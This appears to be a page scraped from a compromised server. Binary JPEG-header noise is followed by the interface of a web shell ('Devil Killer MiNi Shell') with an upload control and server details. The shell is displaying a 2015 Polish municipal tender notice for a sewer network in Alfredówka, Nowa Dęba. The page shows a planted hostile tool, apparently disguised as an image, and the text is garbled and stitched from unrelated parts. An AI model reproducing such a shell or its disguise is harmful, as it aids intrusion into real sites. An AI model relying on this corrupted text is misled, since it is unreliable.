JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150120/13626-N-2015.html

<p class="kh_header"><b>Nowa Dęba: Budowa sieci kanalizacji sanitarnej wraz z budową przyłączy do gospodarstw domowych w miejscowości Alfredówka, gmina Nowa Dęba</b><br>
<b>Numer ogłoszenia: 13626 - 2015; data zamieszczenia: 20.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowa Dęba , ul. Rzeszowska 3, 39-460 Nowa Dęba, woj. podkarpackie, tel. 015 8462671, faks 015 8465137.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowadeba.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej wraz z budową przyłączy do gospodarstw domowych w miejscowości Alfredówka, gmina Nowa Dęba.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zadanie: Budowa sieci kanalizacji sanitarnej wraz z budową przyłączy do gospodarstw domowych w miejscowości Alfredówka, gmina Nowa Dęba.w którego zakres rzeczowy wchodzą:
2. Zakres robót:
W zakresie budowy sieci kanalizacji sanitarnej
Sieć grawitacyjna - z rur kanalizacyjnych PVC o średnicach fi 315, fi 250, fi 200 i fi 160;
Sieć tłoczna - z rur PEHD o średnicach fi 90 i fi 110 ;
Przepompownie ścieków - szt. 10;
Zasilanie energetyczne przepompowni ścieków ;
Studzienki kanalizacyjne 
Obsługę geodezyjną na etapie przygotowania jak i po wykonaniu zadania (tyczenie + inwentaryzacja geodezyjna powykonawcza);
Po zakończeniu robót - sporządzenie kosztorysu powykonawczego.

W zakresie budowy przyłączy kanalizacyjnych do budynków: 
Przyłącza kanalizacyjne do budynków - z rur kanalizacyjnych PVC o średnicy fi 160 (około 200 szt.)  ;
Obsługę geodezyjną na etapie przygotowania jak i po wykonaniu zadania ( tyczenie + inwentaryzacja geodezyjna powykonawcza) ;
Po zakończeniu robót - sporządzenie kosztorysu powykonawczego.
Ścieki sanitarne odprowadzane będą do istniejącej przepompowni ścieków sanitarnych, a następnie do mechaniczno-biologicznej oczyszczalni ścieków w Nowej Dębie.

3. Koszty dostawy i montażu wszelkich urządzeń i instalacji muszą zawierać całość kosztów związanych z realizacją, w tym wykonanie projektów wykonawczych w uzgodnieniu z inwestorem, jeśli takie będą niezbędne do należytego wykonania całości zadania oraz uzyskania certyfikatów, dopuszczenia do użytkowania oraz koszty rozruchu, instruktaży, szkoleń oraz gwarancji.

4. Wbudowane materiały winny posiadać atesty, certyfikaty, deklaracje zgodności. Na każde żądanie Zamawiającego lub inspektora nadzoru Wykonawca obowiązany jest okazać w stosunku do wskazanych materiałów: certyfikat zgodności z Polską normą lub aprobatę techniczną.

5. Wymagany okres rękojmi i gwarancji na wykonane roboty ( materiały i robociznę) wynosi min 5 lat od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.

6. Zakres robót zawierają przedmiary robót stanowiące załącznik nr 3 SIWZ oraz projekt techniczny stanowiący załącznik nr 7 do SIWZ. Dokumentem podstawowym przy realizacji robót jest projekt budowlano - wykonawczy. Przedmiary są elementem uzupełniającym, który będzie brany pod uwagę jedynie w przypadku braku elementów robót w projekcie.

7. Projekt budowlany dostępny jest do wglądu w Urzędzie Miasta i Gminy Nowa Dęba, ul. Rzeszowska 3 pok. 302 w godzinach od 9:00 - 15:00. lub na stronie internetowej Zamawiającego http:www.nowadeba.pl  Zał. nr 7 do SIWZ

8.Uwaga : Zamawiający zgadza się na zastosowanie innych materiałów niż przyjęte w projekcie pod warunkiem zastosowania kompletnych systemów o parametrach nie gorszych niż przyjęte w projekcie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>a) Zamawiający dopuszcza udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 i 7 ustawy - prawo zamówień publicznych. 
b) Zgodnie z art. 67 ust 1 pkt. 5 roboty dodatkowe niewynikające z Dokumentacji Projektowej, których potwierdzona przez Zamawiającego konieczność wystąpi w toku realizacji przedmiotu umowy, a których zakres nie przekroczy 25 % wartości uprzedniego zamówienia, Wykonawca obowiązany jest wykonać na dodatkowe zamówienie Zamawiającego udzielone z wolnej ręki, przy zachowaniu tych samych norm, parametrów i standardów. 
c) Wynagrodzenie wykonawcy za wykonanie robót nieprzewidzianych, odrębnie zleconych, niewynikających z Dokumentacji Projektowej, ustalone będzie kosztorysami dodatkowymi, sporządzonymi w oparciu o Przedmiar robót potwierdzony przez Inspektora nadzoru, przy przyjęciu elementów kosztorysowania, cen materiałów i pracy sprzętu zastosowanych przy sporządzaniu kosztorysu ofertowego. Odnośnie materiałów i sprzętu, który nie wystąpił w kosztorysach ofertowych zastosowane będą ceny aktualne dla okresu realizacji, lecz nie wyższe niż średnie publikowane przez SEKOCENBUD.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.00-6, 45.23.24.10-9, 45.23.24.11-6, 45.23.24.23-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 150 000,00 zł. (słownie: sto pięćdziesiąt tysięcy złotych) do dnia 5 lutego2015 r. do godz. 11:00.
2. Wadium może być wnoszone w formie dopuszczonej ustawą Pzp.
3. W przypadku wpłaty wadium w formie przelewu należy wpłacić go na rachunek Urzędu Miasta i Gminy Nowa Dęba w Banku Spółdzielczym w Tarnobrzegu O Nowa Dęba nr rach:  82 9434 1083 2003 1300 0101 0007.
4. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach - dokument wadium należy złożyć w kasie Urzędu Miasta i Gminy Nowa Dęba (pok. 206)
5. Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem Wykonawcy z postępowania.
6. Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 ust. 5 ustawy Prawo zamówień publicznych tj. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonych w SIWZ, (jeżeli SIWZ przewiduje wymóg wniesienia zabezpieczenia),
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
7. Zwrot wadium nastąpi zgodnie z warunkami określonymi w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udowodni iż w okresie pięciu lat przed terminem składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonał minimum jedno zadanie inwestycyjne w zakresie budowy sieci kanalizacji sanitarnej grawitacyjnej i ciśnieniowej, o wartości brutto (wraz z podatkiem VAT) co najmniej 3 000 000,00 PLN (trzy miliony złotych), poparte dokumentami stwierdzającymi prawidłowość wykonania tych robót</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udowodnić, iż w momencie realizacji zadania będzie dysponował osobami z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w następujących branżach:
- sanitarna,
- elektryczna</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawcy muszą posiadać ubezpieczenie od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności na kwotę nie niższą niż 3 000 000,00 zł 
(trzy miliony złotych);
- Należy przedstawić informacje banku lub spółdzielczej kasy oszczędnościowo kredytowej, w której wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 3 000 000,00zł (trzy miliony złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Pzp -zał. nr 1 do SIWZ formularz ofertowy
- Kopię wpłaty wadium,
- Oświadczenie o grupie kapitałowej - załącznik nr 1 do SIWZ formularz ofertowy,
- Wykonawca, którego oferta zostanie wyłoniona, jako najkorzystniejsza, zobowiązany jest przed podpisaniem umowy przedstawić zamawiającemu kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej z cenami jednostkowymi, wartością pozycji.
UWAGA! Zamawiający nie wymaga przedkładania kosztorysu ofertowego na etapie składania ofert. 
- Zamawiający dopuszcza wykonanie przedmiotu zamówienia przy udziale podwykonawców. Zamawiający żąda wskazania przez Wykonawcę w ofercie zakresu zamówienia których wykonanie Wykonawca powierza podwykonawcom,
- Zamawiający żąda, aby w przypadku, gdy wykonawca będzie polegał na zdolności ekonomicznej i finansowej podmiotów trzecich celem wykazania spełnienia w tym zakresie warunku udziału w postępowaniu wykonawca przedstawił dokument tj.: oświadczenie o odpowiedzialności solidarnej wykonawcy i podmiotu, na którego zasoby ekonomiczne i finansowe powołuje się.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres rękojmi za wady i gwarancji jakości - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
2.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie któ-rej dokonano wyboru Wykonawcy, chyba że konieczność takich zmian wynika z wystąpienia na-stępujących okoliczności:
2.1.	 Zmiana terminu wykonania umowy  - w przypadku : 
a)	wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót lub doko-nywanie odbiorów na długotrwałe opady, niskie lub wysokie temperatury powietrza, 
b)	braku środków finansowych na realizację inwestycji, z przyczyn niezależnych od Zamawia-jącego,
c)	opóźnienia w przekazaniu placu budowy (odnotowane w dzienniku budowy oraz udoku-mentowane stosownymi protokołami podpisanymi przez Kierownika Budowy                    i Inspektora nadzoru i zaakceptowane przez Zamawiającego) lub wstrzymania realizacji robót, przez Zamawiającego,
d)	konieczność dokonania zmian lub konsekwencje błędów w dokumentacji projektowej, 
e)	wystąpienia zjawisk związanych z działaniem siły wyższej (klęska żywiołowa, niepokoje społeczne, działania militarne itp.), 
f)	opóźnienia w wyniku decyzji administracyjnych (decyzja władz publicznych, zmiana obo-wiązującego prawa, oczekiwanie na nieprzewidziane wcześniej konieczne wyniki ekspertyz, wyrok sądu itp.),
g)	zmiany podyktowanej zmianą przepisów prawa,
h)	gdy zaszła konieczność uzyskania niemożliwych do przewidzenia na etapie planowania in-westycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów, zmiana terminu realizacji o niezbędny  czas ich uzyskania,
i)	gdy prace objęte umową zostały wstrzymane przez właściwe organy co uniemożliwi termi-nowe zakończenie realizacji przedmiotu umowy.
W przypadku wystąpienia którejkolwiek z wymienionych wyżej okoliczności w zakresie mającym wpływ na przebieg realizacji zamówienia, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty jednak nie dłużej niż  o czas  równy okresowi przerwy, postoju lub opóźnienia.
2.2.	Zmiana umówionego zakresu robót - w przypadku: 
a)	ograniczenia finansowego po stronie zamawiającego z przyczyn od niego niezależnych.
b)	jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, czego strony nie przewidywały przy zawarciu umowy.
c)	liczba wykonanych przyłączy do budynków  może ulec zmianie w zależności od ilości doko-nanych zgłoszeń podłączenia budynku do kanalizacji przez mieszkańców i ilości wpłat do-konanych  przez poszczególne gospodarstwa domowe.  
2.3.	Zmiana sposobu spełnienia świadczenia. Zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:
a)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowana zaprzestaniem pro-dukcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaosz-czędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót.
c)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na za-oszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosz-tów eksploatacji wykonanego przedmiotu umowy;
d)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicz-nych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicz-nej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
e)	odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykona-nia i odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmio-tu umowy przy dotychczasowych założeniach technologicznych;
f)	    odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wyko-nania i odbioru robót warunki terenowe, w szczególności istnienie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
g)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań tech-nicznych lub materiałowych ze względu na zmiany obowiązującego prawa; 
h)	konieczność usunięcia sprzeczności w dokumentacji w przypadku niemożności usunięcia sprzeczności przy pomocy wykładni, w szczególności gdy sprzeczne zapisy mają równy sto-pień pierwszeństwa.
2.4.	Organizacyjnej polegającej na: zmianie osób, podwykonawców, grup wykonawców i innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnie-nia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, jakie posia-dają podmioty zamieniane. Zmiany te mogą nastąpić z przyczyn organizacyjnych pod wa-runkiem, że osoby podwykonawcy, grupy wykonawców i innych podmiotów spełniają wszystkie wymogi wynikające z SIWZ i złożonej oferty.
2.5.	Wynagrodzenia: 
a)	gdy zmianie ulegnie urzędowa stawka podatku VAT.
b)	ze względów ekonomicznych lub technicznych dopuszcza się ograniczenie zakresu robót wraz ze zmniejszeniem wynagrodzenia do 20%.
c)	w przypadkach określonych w pkt. 2.2 i 2.3  niniejszego §.
d)	Obniżenie wynagrodzenia w odpowiednim stosunku w przypadku istnienia usterki lub wady mającej charakter istotny i nieusuwalny (nie tylko takich uniemożliwiających  użytkowanie) ,  oraz takiej, która odbiera cechy właściwe danemu obiektowi (zarówno funkcjonalne jak i es-tetyczne). 
2.6.	Zmiana wynagrodzenia z powodu przyczyn wskazanych w pkt. 2.2 i 2.3 niniejszego § nastą-pi na podstawie opracowanych kosztorysów.
Kosztorysy te opracowane będą w oparciu o następujące założenia:
a)	ceny jednostkowe robót lub ceny czynników produkcji zostaną przyjęte z kosztorysu opracowanego metodą kalkulacji uproszczonej, a ilości wykonanych robót zgodnie z dokonanymi obmiarami;
b)	w przypadku, gdy nie będzie możliwe rozliczenie danej roboty w oparciu o w/w. zapisy, brakujące ceny czynników produkcji zostaną przyjęte z zeszytów SEKO-CENBUD (jako niskie dla województwa podkarpackiego) za okres ich wbudowa-nia. Podstawą do określenia nakładów rzeczowych będą KNR-y. W przypadku bra-ku odpowiednich pozycji, - KNNR-y, a następnie wycena indywidualna Wykonaw-cy zatwierdzona przez inspektora nadzoru i Zamawiającego.
3.	Wystąpienie którejkolwiek z wymienionych w pkt.2. ppkt. 2.1; 2.2; 2.3; 2.4: 2.5,  okoliczności nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania. 
4.	Zamawiający dopuszcza możliwość niezrealizowania pełnego zakresu robót w sytuacji  której nie można było przewidzieć w chwili zawarcia umowy a nie powstałych z winy Zamawiającego ani Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowadeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINA  NOWA DĘBA
ul. RZESZOWSKA
39-460  NOWA DĘBA.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2015 godzina 11:00, miejsce: GMINA  NOWA DĘBA
ul. RZESZOWSKA
39-460  NOWA DĘBA
